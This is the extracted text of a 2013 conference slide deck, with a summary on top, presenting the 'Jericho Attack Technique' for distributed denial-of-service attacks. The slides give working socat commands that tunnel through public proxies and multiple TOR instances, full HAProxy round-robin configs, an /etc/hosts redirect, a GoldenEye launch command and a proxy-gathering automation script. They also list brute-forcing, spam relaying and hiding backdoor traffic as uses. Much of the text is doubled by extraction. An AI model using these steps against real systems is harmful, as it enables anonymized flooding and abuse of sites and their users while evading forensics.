The document describes the Jericho Attack Technique for launching distributed denial-of-service (DDoS) attacks using public SOCKS proxies, TOR instances, and load balancing software. The technique involves binding multiple sockets from different proxy/TOR resources to a target system and load balancing the connections through programs like HAProxy. This allows evading connection limits, hiding the origin of attacks, and efficiently launching low-bandwidth Layer 7 DDoS attacks in a distributed manner. Instructions are provided on setting up socat tunnels through proxies/TOR, configuring HAProxy for load balancing, and modifying hosts files to point targets to the local system.
1. Jericho Attack TechniqueJericho Attack Technique
Cluster-bombing TCP attacks for maximum impactCluster-bombing TCP attacks for maximum impact
Jan SeidlJan Seidl
jseidl@wroot.orgjseidl@wroot.org
@jseidl@jseidl
2. $ whoami$ whoami
AboutAbout
Full Name: Jan SeidlFull Name: Jan Seidl
Origin: Rio de Janeiro, RJ – BrazilOrigin: Rio de Janeiro, RJ – Brazil
Work:Work:
●
CTO @ TI SafeCTO @ TI Safe
●
OpenSource contributor for: PEV, LogstashOpenSource contributor for: PEV, Logstash
●
Codes and snippets @ github.com/jseidlCodes and snippets @ github.com/jseidl
Features:Features:
●
UNIX Evangelist/Addict/Freak (but no fanboy!)UNIX Evangelist/Addict/Freak (but no fanboy!)
●
Python and C loverPython and C lover
●
Coffee dependentCoffee dependent
●
Hates printers and social networksHates printers and social networks
●
Proud DC Labs ResearcherProud DC Labs Researcher Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
3. $ whoami$ whoami
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
4. $ whoami$ whoami
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
STUPID, BROKE, NERD, BROKESTUPID, BROKE, NERD, BROKE
5. DisclaimerDisclaimer
‘‘Jericho’ is a product from the fictional company ‘StarkJericho’ is a product from the fictional company ‘Stark
Industries’ from “The Iron Man” movie franchise fromIndustries’ from “The Iron Man” movie franchise from
Paramount Pictures and Marvel Studios, as well as anyParamount Pictures and Marvel Studios, as well as any
related picture presented in this presentation.related picture presented in this presentation.
Please do not sue me.Please do not sue me.
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
6. x00 Overviewx00 Overview
x01 Application / Usesx01 Application / Uses
x02 Required Partsx02 Required Parts
x03 Weapon Assemblyx03 Weapon Assembly
x04 Weapon Tuningx04 Weapon Tuning
x05 Launching the attackx05 Launching the attack
x06 Weapon Maintenancex06 Weapon Maintenance
x07 Escalating Firepowerx07 Escalating Firepower
x08 Turning into a Smart Weaponx08 Turning into a Smart Weapon
x09 Demo!x09 Demo!
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
AgendaAgenda
7. Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
OverviewOverview
The attack consists on utilizingThe attack consists on utilizing public SOCKS proxiespublic SOCKS proxies
andand TOR instancesTOR instances throughthrough socket multiplexingsocket multiplexing
softwaresoftware (e.g.: Load Balancing/Cluster software) as(e.g.: Load Balancing/Cluster software) as
relays for attacks in a load-balancing fashionrelays for attacks in a load-balancing fashion
At a glance
8. Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
OverviewOverview
public SOCKS proxies + TOR instances + socketpublic SOCKS proxies + TOR instances + socket
multiplexing softwaremultiplexing software
At a glance
9. Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
OverviewOverview
At a glance
10. Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
OverviewOverview
Schematics
Attacker
Proxy 1
Proxy 2
Proxy 3
Proxy 4
Proxy 5
Proxy 6
Proxy 7
VictimHAProxy
11. Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
OverviewOverview
Evading connection and rate limitingEvading connection and rate limiting
Bypassing country/origin restrictionsBypassing country/origin restrictions
Hiding origin of attacks, making forensics people sad :(Hiding origin of attacks, making forensics people sad :(
Low bandwidth attack such as Layer 7 DOS attacksLow bandwidth attack such as Layer 7 DOS attacks
Very efficient for
Ataques DoS Super Eficientes: Layer 7, Android, load balancing e Tor (pt_BR)Ataques DoS Super Eficientes: Layer 7, Android, load balancing e Tor (pt_BR)
http://slidesha.re/14yYiuVhttp://slidesha.re/14yYiuV
12. Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
OverviewOverview
At first HAProxy may seem as a load balancer strictlyAt first HAProxy may seem as a load balancer strictly
for HTTP(S), but it’s not.for HTTP(S), but it’s not.
HAProxy’s actual description is “The Reliable, HighHAProxy’s actual description is “The Reliable, High
PerformancePerformance TCPTCP/HTTP Load Balancer”./HTTP Load Balancer”.
Cool, huh?Cool, huh?
Paying closer attention
13. Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
UsesUses
Applications for the Jericho Attack Technique
14. Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
UsesUses
Web scraping/spideringWeb scraping/spidering
Limited API requestsLimited API requests
IP-based anti-fraud schemes (eg: Online Voting)IP-based anti-fraud schemes (eg: Online Voting)
User enumerationUser enumeration
Password brute-forcingPassword brute-forcing
Basic multiplexing use
15. Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
UsesUses
Making Layer 7 Denial-of-Service attacks intoMaking Layer 7 Denial-of-Service attacks into
distributed configuration (DoS → DdoS)distributed configuration (DoS → DdoS)
(I like this one very much in particular)(I like this one very much in particular)
Hitting hard
16. Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
UsesUses
Multiplexing mail relays for SPAMMultiplexing mail relays for SPAM
Multiplexing and anonymizing backdoor connections /Multiplexing and anonymizing backdoor connections /
commandscommands
Even more? Go crazy!Even more? Go crazy!
Going deeper
17. Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
UsesUses
FTPFTP
SMTP(S) POP3(S) IMAP(S)SMTP(S) POP3(S) IMAP(S)
SSHSSH
RDP / VNCRDP / VNC
MySQLMySQL
many more...many more...
Possibly supported protocols
18. Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Required partsRequired parts
Building the weapon
19. Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Required partsRequired parts
Main assembly
Socat: Multipurpose RelaySocat: Multipurpose Relay
http://www.dest-unreach.org/socat/http://www.dest-unreach.org/socat/
SSL support:SSL support:
HTTPS, IMAPS, POPS, LDAPSHTTPS, IMAPS, POPS, LDAPS
20. Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Required partsRequired parts
Main assembly
HAProxyHAProxy
http://haproxy.1wt.eu/http://haproxy.1wt.eu/
““The Reliable, High Performance TCP/HTTP LoadThe Reliable, High Performance TCP/HTTP Load
Balancer”Balancer”
REQUEST → HAPROXY → { SERVER A, SERVER B,REQUEST → HAPROXY → { SERVER A, SERVER B,
SERVER C }SERVER C }
21. Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Required partsRequired parts
Resources
SOCKS/HTTP(S) ProxiesSOCKS/HTTP(S) Proxies
http://www.proxynova.com/proxy-server-list/http://www.proxynova.com/proxy-server-list/
http://hidemyass.com/proxy-list/http://hidemyass.com/proxy-list/
Just google it...Just google it...
22. Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Required partsRequired parts
Resources
TOR exit nodesTOR exit nodes
PRO TIP: You can run as many TOR tunnels as you want (:PRO TIP: You can run as many TOR tunnels as you want (:
tor --RunAsDaemon 1 --CookieAuthentication 0tor --RunAsDaemon 1 --CookieAuthentication 0
--HashedControlPassword "pwd" --ControlPort 4444 --PidFile--HashedControlPassword "pwd" --ControlPort 4444 --PidFile
torN.pid --SocksPort 9050 --DataDirectory data/torNtorN.pid --SocksPort 9050 --DataDirectory data/torN
Multi-TORMulti-TOR
https://github.com/jseidl/Multi-TOR/https://github.com/jseidl/Multi-TOR/
EX: ./multi-tor.sh 5 # Opens 5 TOR instancesEX: ./multi-tor.sh 5 # Opens 5 TOR instances
23. Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Required partsRequired parts
Important Note
The proxies may or may not require authentication since socatThe proxies may or may not require authentication since socat
supports proxy authentication adding the parameter as follows:supports proxy authentication adding the parameter as follows:
proxyauth=user:passproxyauth=user:pass
24. Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Required partsRequired parts
Important Note
Some public proxies append additional headers like X-Forwarded-For thatSome public proxies append additional headers like X-Forwarded-For that
may ruin the whole purpose of utilizing a Jericho attack perspective.may ruin the whole purpose of utilizing a Jericho attack perspective.
(Thanks for Lucas Fernando Amorim for remembering that!)(Thanks for Lucas Fernando Amorim for remembering that!)
25. Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Required partsRequired parts
Important Note
For TOR, one can useFor TOR, one can use two-hop circuits for maximumtwo-hop circuits for maximum
performance and degraded anonymityperformance and degraded anonymity oror greater-hopgreater-hop
circuits for greater anonymity and degraded performancecircuits for greater anonymity and degraded performance..
It just depends on the use.It just depends on the use.
Tor: Four Hops instead of ThreeTor: Four Hops instead of Three
http://coldwaterq.com/?11http://coldwaterq.com/?11
TOR Auto-circuitTOR Auto-circuit
https://thesprawl.org/projects/tor-autocircuit/https://thesprawl.org/projects/tor-autocircuit/
TOR control protocolTOR control protocol
https://thesprawl.org/research/tor-control-protocol/https://thesprawl.org/research/tor-control-protocol/
26. Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Required partsRequired parts
(not so) Important Note
I’ve developed a python tool named (albeit not very creatively)I’ve developed a python tool named (albeit not very creatively) proxygetproxyget..
BeautifulSoup + Mechanize = Smart Scraping!BeautifulSoup + Mechanize = Smart Scraping!
Scripting → HAProxy.conf auto-generation for a Jericho attackScripting → HAProxy.conf auto-generation for a Jericho attack
This tool is yet to be released. Stay tuned!This tool is yet to be released. Stay tuned!
27. Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Weapon AssemblyWeapon Assembly
Sticking the parts together
Easy simple steps:Easy simple steps:
1. Create lots of socat bindings to the victim, each from a1. Create lots of socat bindings to the victim, each from a
different resource (proxy or TOR instance)different resource (proxy or TOR instance)
2. Configure the locally bound socat ports in HAProxy2. Configure the locally bound socat ports in HAProxy
3. Point victim's DNS name to localhost on /etc/hosts3. Point victim's DNS name to localhost on /etc/hosts
4. Fire at will4. Fire at will
28. Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Weapon AssemblyWeapon Assembly
Sticking the parts together: socat with proxies
# socat TCP4-LISTEN:80# socat TCP4-LISTEN:80
PROXY:<PROXY_IP>:<VICTIM_IP>:80,proxyport=<PROXY_PORT>PROXY:<PROXY_IP>:<VICTIM_IP>:80,proxyport=<PROXY_PORT>
# socat TCP4-LISTEN:8081# socat TCP4-LISTEN:8081
PROXY:190.221.25.225:93.184.216.119:80,proxyport=8080PROXY:190.221.25.225:93.184.216.119:80,proxyport=8080
Example:Example:
29. Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Weapon AssemblyWeapon Assembly
Sticking the parts together: socat with TOR
# socat TCP4LISTEN:80,fork# socat TCP4LISTEN:80,fork
SOCKS4A:localhost:<VICTIM_IP>:80,socksport=9050SOCKS4A:localhost:<VICTIM_IP>:80,socksport=9050
# socat TCP4-LISTEN:8081# socat TCP4-LISTEN:8081
SOCKS4A:localhost:93.184.216.119:80,socksport=9050SOCKS4A:localhost:93.184.216.119:80,socksport=9050
Example:Example:
30. Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Weapon AssemblyWeapon Assembly
Sticking the parts together: HAProxy
listen ddos 0.0.0.0:80listen ddos 0.0.0.0:80
mode tcpmode tcp
balancebalance roundrobinroundrobin
serverserver inst1 localhost:8080inst1 localhost:8080
serverserver inst2 localhost:8081inst2 localhost:8081
serverserver inst3 localhost:8082inst3 localhost:8082
serverserver inst4 localhost:8083inst4 localhost:8083
31. Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Weapon AssemblyWeapon Assembly
Sticking the parts together: HAProxy (larger sample)
globalglobal
maxconn 10000maxconn 10000 # set this accordingly to MAX within your kernel socket limits# set this accordingly to MAX within your kernel socket limits
user haproxyuser haproxy
group haproxygroup haproxy
daemondaemon
defaultsdefaults
mode tcpmode tcp
retries 3retries 3
option redispatchoption redispatch
maxconn 20000maxconn 20000 # set accordingly# set accordingly
contimeout 5000contimeout 5000 # set accordingly# set accordingly
clitimeout 50000clitimeout 50000 # set accordingly# set accordingly
srvtimeout 50000srvtimeout 50000 # set accordingly# set accordingly
# Below we are configuring our socket list. You may mix TOR sockets with SOCKS-proxied# Below we are configuring our socket list. You may mix TOR sockets with SOCKS-proxied
sockets.sockets.
listen jericho 0.0.0.0:80listen jericho 0.0.0.0:80 # just a instance name# just a instance name
mode tcpmode tcp
balance roundrobinbalance roundrobin # gives more time within socket/outoging IP reuse# gives more time within socket/outoging IP reuse
server inst1 localhost:8080server inst1 localhost:8080 # SOCKS proxy# SOCKS proxy
server inst2 localhost:9051server inst2 localhost:9051 # TOR instance# TOR instance
server inst3 localhost:9052server inst3 localhost:9052 # TOR instance# TOR instance
32. Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Weapon AssemblyWeapon Assembly
Sticking the parts together: /etc/hosts
# Jericho target below this line# Jericho target below this line
# make him suffer (:# make him suffer (:
example.com, www.example.comexample.com, www.example.com 127.0.0.1127.0.0.1
33. Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Weapon AssemblyWeapon Assembly
Ta-da!
34. Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Weapon TuningWeapon Tuning
Moar firepower!Moar firepower!
35. Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Weapon TuningWeapon Tuning
About performanceAbout performance
There are several parameters on the linux kernel that can beThere are several parameters on the linux kernel that can be
tuned in order to achieve better TCP performance.tuned in order to achieve better TCP performance.
Because ‘performance’ is relative to the attack being conductedBecause ‘performance’ is relative to the attack being conducted
(you may need more bandwidth or more concurrent connections(you may need more bandwidth or more concurrent connections
or anything else), there are several options that one mustor anything else), there are several options that one must
consider.consider.
36. Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Weapon TuningWeapon Tuning
Linux Tuning ResourcesLinux Tuning Resources
TCP Performance Tuning | SoftpanoramaTCP Performance Tuning | Softpanorama
http://bit.ly/17RiLWvhttp://bit.ly/17RiLWv
Linux Tweaking | Speedguide.netLinux Tweaking | Speedguide.net
http://bit.ly/18JDnlLhttp://bit.ly/18JDnlL
Improving TCP performance over a gigabit network with lots ofImproving TCP performance over a gigabit network with lots of
connections and high traffic of small packets | ServerFaultconnections and high traffic of small packets | ServerFault
http://bit.ly/1fRyjhZhttp://bit.ly/1fRyjhZ
Linux TCP/IP Tuning | LognormalLinux TCP/IP Tuning | Lognormal
http://bit.ly/17Rj8QNhttp://bit.ly/17Rj8QN
37. Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Launching the attackLaunching the attack
38. Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Launching the attackLaunching the attack
Check that everything is workingCheck that everything is working
You may want to socat resources first to an IP testing website toYou may want to socat resources first to an IP testing website to
verify that Jericho is working successfullyverify that Jericho is working successfully
Then rebind sockets to final destination (victim)Then rebind sockets to final destination (victim)
(don't forget the /etc/hosts entry!)(don't forget the /etc/hosts entry!)
39. Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Launching the attackLaunching the attack
Fire in the hole!Fire in the hole!
# ./goldeneye.py http://www.example.com/index.php -t# ./goldeneye.py http://www.example.com/index.php -t
1000 -m get1000 -m get
Ahhh... easy and transparent!Ahhh... easy and transparent!
40. Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Launching the attackLaunching the attack
Fire in the hole!Fire in the hole!
41. Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Weapon MaintenanceWeapon Maintenance
42. Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Weapon MaintenanceWeapon Maintenance
Check if your exit proxies are still working and not blockedCheck if your exit proxies are still working and not blocked
Check if your TOR identities aren't blockedCheck if your TOR identities aren't blocked
Gather new proxies and reconfigureGather new proxies and reconfigure
Renew TOR identities (tor_newid.sh, part of Multi-TOR)Renew TOR identities (tor_newid.sh, part of Multi-TOR)
Keeping the blade sharpKeeping the blade sharp
43. Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Weapon MaintenanceWeapon Maintenance
Watchdog daemons / scriptsWatchdog daemons / scripts
Cron jobsCron jobs
Manual checkingManual checking
Keeping the blade sharpKeeping the blade sharp
44. Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Escalating FirepowerEscalating Firepower
Multiple Jericho setups on many hostsMultiple Jericho setups on many hosts
++
Intermediary Forwarder/Multiplexer Jericho node(s)Intermediary Forwarder/Multiplexer Jericho node(s)
++
Multiple or single attack sourcesMultiple or single attack sources
Large-size clustered attack environmentsLarge-size clustered attack environments
45. Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Escalating FirepowerEscalating Firepower
Single-tier cascading Jericho architechtureSingle-tier cascading Jericho architechture
46. Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Escalating FirepowerEscalating Firepower
Multi-tier cascading Jericho architechtureMulti-tier cascading Jericho architechture
47. Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Escalating FirepowerEscalating Firepower
48. Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Turning into a smart weaponTurning into a smart weapon
49. Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Turning into a smart weaponTurning into a smart weapon
Initialization SequenceInitialization Sequence
Define Resources
multi-tor.sh
proxyget.py IP PORT
list
TOR socket
list
joinlists.sh jericho.res
50. Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Turning into a smart weaponTurning into a smart weapon
Automatic testingAutomatic testing
testresources.shjericho.res
all resources
valid?
proceed
gather and
revalidate
resources
51. Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Turning into a smart weaponTurning into a smart weapon
Self-configurationSelf-configuration
initjericho.sh
list2socat.sh
list2haproxycfg.sh haproxy.cfg
jericho.res
reload
haproxy
52. Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Turning into a smart weaponTurning into a smart weapon
Full routineFull routine
Initialize Configure Test Run
53. Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Turning into a smart weaponTurning into a smart weapon
Poor-man's smart JerichoPoor-man's smart Jericho
# Gather proxy list
./proxyget.py --minanon high --minspd medium --type http --quantity 200
> /tmp/proxies
# Parse list
cut -f3,7 -d' ' /tmp/proxies > /tmp/parsedproxy
# Spawn socat entries
./gensocat.sh 93.184.216.119 /tmp/parsedproxy
# Reconfigure haproxy
echo "$HAPROXYCONF_HEAD" > /tmp/haproxy
./genhaproxycfg.sh 200 >> /tmp/haproxy
cp /etc/haproxy/haproxy.cfg /etc/haproxy/haproxy.cfg.old
cp /tmp/haproxy /etc/haproxy/haproxy.cfg
/etc/init.d/haproxy restart
54. Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Turning into a smart weaponTurning into a smart weapon
What else?What else?
Web Interfaces?Web Interfaces?
API?API?
Cloud-hosted?Cloud-hosted?
Quick-deploy packages?Quick-deploy packages?
Jericho-as-a-Service (JaaS)?Jericho-as-a-Service (JaaS)?
55. Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Demo (:Demo (:
Jericho Attack Technique @ YouTubeJericho Attack Technique @ YouTube
http://youtu.be/YRMyW2OA0gIhttp://youtu.be/YRMyW2OA0gI
56. Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Questions?Questions?
57. Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Thank you!Thank you!
–– To peace!To peace!
jseidl@wroot.org / @jseidl / http://wroot.org